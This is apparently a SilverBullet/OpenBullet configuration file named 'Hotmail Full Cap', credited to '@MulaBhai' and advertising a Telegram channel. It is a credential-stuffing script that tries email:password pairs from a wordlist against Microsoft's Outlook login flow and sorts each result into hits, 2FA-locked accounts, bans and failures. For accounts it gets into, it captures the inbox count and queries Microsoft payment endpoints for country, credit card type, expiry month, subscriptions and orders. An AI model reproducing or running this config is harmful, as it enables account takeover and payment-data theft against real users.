[SETTINGS]
{
  "Name": "Hotmail.com Full Cap",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2024-01-26T00:13:39.757186+05:00",
  "AdditionalInfo": "JOIN MY CHANNEL https://t.me/officialgoldendragon",
  "RequiredPlugins": [],
  "Author": "@MulaBhai",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Hotmail Full Cap",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": "@MulaBhai",
  "Message": "JOIN MY CHANNEL https://t.me/officialgoldendragon",
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION URLEncode "<USER>" -> VAR "US" 

REQUEST GET "https://outlook.live.com/owa/?nlp=1" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "&lc=" "&" -> VAR "lc" 

PARSE "<ADDRESS>" LR "" "" -> VAR "url" 

REQUEST GET "<url>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "type=\"hidden\" name=\"PPFT\" id=\"i0327\" value=\"" "\"" EncodeOutput=TRUE -> VAR "ppft" 

FUNCTION URLEncode "<USER>" -> VAR "us" 

FUNCTION URLEncode "<PASS>" -> VAR "ps" 

PARSE "<SOURCE>" LR "urlPostMsa:'" "'" -> VAR "post" 

FUNCTION URLDecode "<url>" -> VAR "link" 

PARSE "<link>" LR "RpsCsrfState=" "&" -> VAR "csrf" 

PARSE "<link>" LR "&ct=" "&" -> VAR "ct" 

PARSE "<link>" LR "&id=" "&" -> VAR "id" 

REQUEST POST "<post>" 
  CONTENT "i13=0&login=<us>&loginfmt=<us>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<ps>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=<ppft>&PPSX=Passport&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=0&isSignupPost=0&isRecoveryAttemptPost=0&i19=17299" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Referer: <url>" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 
  HEADER "sec-ch-ua: \"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"" 
  HEADER "sec-ch-ua-mobile: ?1" 
  HEADER "sec-ch-ua-platform: \"Android\"" 

KEYCHECK 
  KEYCHAIN Failure AND 
    KEY "<SOURCE>" DoesNotContain ",AC:null,urlFedConvertRename" 
    KEY "incorrect account or password.\"," 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Failure OR 
    KEY "timed out" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "PPAuth" 
    KEY "<COOKIES{*}>" Contains "WLSSC" 
    KEY "name=\"ANON\"" 
    KEY "sSigninName" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 
    KEY "https://account.live.com/profile/accrue?mkt=" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Email/Confirm?mkt" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/cancel?mkt=" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/Abuse?mkt=" 

PARSE "<post>" LR "id=" "" -> VAR "id" 

PARSE "<post>" LR "cobrandid=" "&" -> VAR "cob" 

PARSE "<post>" LR "&uaid=" "&" -> VAR "uaid" 

PARSE "<post>" LR "&opid=" "&" -> VAR "opid" 

REQUEST POST "https://login.live.com/ppsecure/post.srf?cobrandid=<cob>&id=<id>&uaid=<uaid>&pid=0&opid=<opid>&route=C104_BAY" 
  CONTENT "LoginOptions=3&type=28&ctx=&hpgrequestid=&PPFT=<ppft>&i19=1759" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"NAP\" id=\"NAP\" value=\"" "\"" EncodeOutput=TRUE -> VAR "nap" 

PARSE "<SOURCE>" LR "name=\"ANON\" id=\"ANON\" value=\"" "\"" EncodeOutput=TRUE -> VAR "anon" 

PARSE "<SOURCE>" LR "input type=\"hidden\" name=\"t\" id=\"t\" value=\"" "\"" EncodeOutput=TRUE -> VAR "t" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"pprid\" id=\"pprid\" value=\"" "\"" -> VAR "ppr" 

REQUEST POST "https://outlook.live.com/owa/?nlp=1&RpsCsrfState=<csrf>&wa=wsignin1.0" 
  CONTENT "wbids=0&pprid=<ppr>&wbid=MSFT&NAP=<nap>&ANON=<anon>&t=<t>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://outlook.live.com/owa/0/?nlp=1&RpsCsrfState=<csrf>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST POST "https://outlook.live.com/owa/0/startupdata.ashx?app=Mini&n=0" 
  CONTENT "app=Mini&n=0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Ms-Cv: i6ji2oPnFn/piDhUC2Gywl.0" 
  HEADER "Origin: https://outlook.live.com" 
  HEADER "Referer: https://outlook.live.com/" 
  HEADER "Sec-Ch-Ua: \"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?1" 
  HEADER "Sec-Ch-Ua-Platform: \"Android\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 
  HEADER "X-Js-Experiment: 5" 
  HEADER "X-Message-Count: 21" 
  HEADER "X-Owa-Canary: <COOKIES(X-OWA-CANARY)>" 
  HEADER "X-Owa-Correlationid: 8dc3250b-f1a2-41e9-a13c-63ced2061ce8" 
  HEADER "X-Owa-Host-App: unknown" 
  HEADER "X-Owa-Hosted-Ux: false" 
  HEADER "X-Owa-Sessionid: a248e548-2d45-4adb-b16e-06e5eb10baac" 
  HEADER "X-Req-Source: Mini" 

PARSE "<SOURCE>" LR "\"DisplayName\":\"Inbox\",\"TotalCount\":" "," -> VAR "totem" 

#Get REQUEST GET "https://login.live.com/oauth20_authorize.srf?client_id=000000000004773A&response_type=token&scope=PIFD.Read+PIFD.Create+PIFD.Update+PIFD.Delete&redirect_uri=https%3A%2F%2Faccount.microsoft.com%2Fauth%2Fcomplete-silent-delegate-auth&state=%7B%22userId%22%3A%22bf3383c9b44aa8c9%22%2C%22scopeSet%22%3A%22pidl%22%7D&prompt=none" 
  
  HEADER "Host: login.live.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Connection: close" 
  HEADER "Referer: https://account.microsoft.com/" 

#Token PARSE "<ADDRESS>" LR "access_token=" "&token_type" -> VAR "Token" 

#urlDecode FUNCTION URLDecode "<Token>" -> VAR "urlDecode" 

#payement REQUEST GET "https://paymentinstruments.mp.microsoft.com/v6.0/users/me/paymentInstrumentsEx?status=active,removed&language=pt-BR" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Authorization: MSADELEGATE1.0=\"<Token>\"" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: paymentinstruments.mp.microsoft.com" 
  HEADER "ms-cV: FbMB+cD6byLL1mn4W/NuGH.2" 
  HEADER "Origin: https://account.microsoft.com" 
  HEADER "Referer: https://account.microsoft.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-GPC: 1" 

FUNCTION Constant "<totem>" -> CAP "Outlook inbox count" 

#Country PARSE "<SOURCE>" LR "\"country\":\"" "\"" CreateEmpty=FALSE -> CAP "Country" 

#Payment_Method PARSE "<SOURCE>" LR "paymentMethodFamily\":\"credit_card\",\"display\":{\"name\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Payment Method" 

#Expiry_Month PARSE "<SOURCE>" LR "\"expiryMonth\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Expiry Month" 

#pay REQUEST GET "https://paymentinstruments.mp.microsoft.com/v6.0/users/me/paymentTransactions" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Authorization: MSADELEGATE1.0=\"<Token>\"" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: paymentinstruments.mp.microsoft.com" 
  HEADER "ms-cV: FbMB+cD6byLL1mn4W/NuGH.2" 
  HEADER "Origin: https://account.microsoft.com" 
  HEADER "Referer: https://account.microsoft.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-GPC: 1" 

#subscriptions PARSE "<SOURCE>" LR "\"subscriptions\":[" "]" CreateEmpty=FALSE -> CAP "subs" 

#Orders PARSE "<SOURCE>" LR "orders\":[" "]" CreateEmpty=FALSE -> CAP "Orders" 

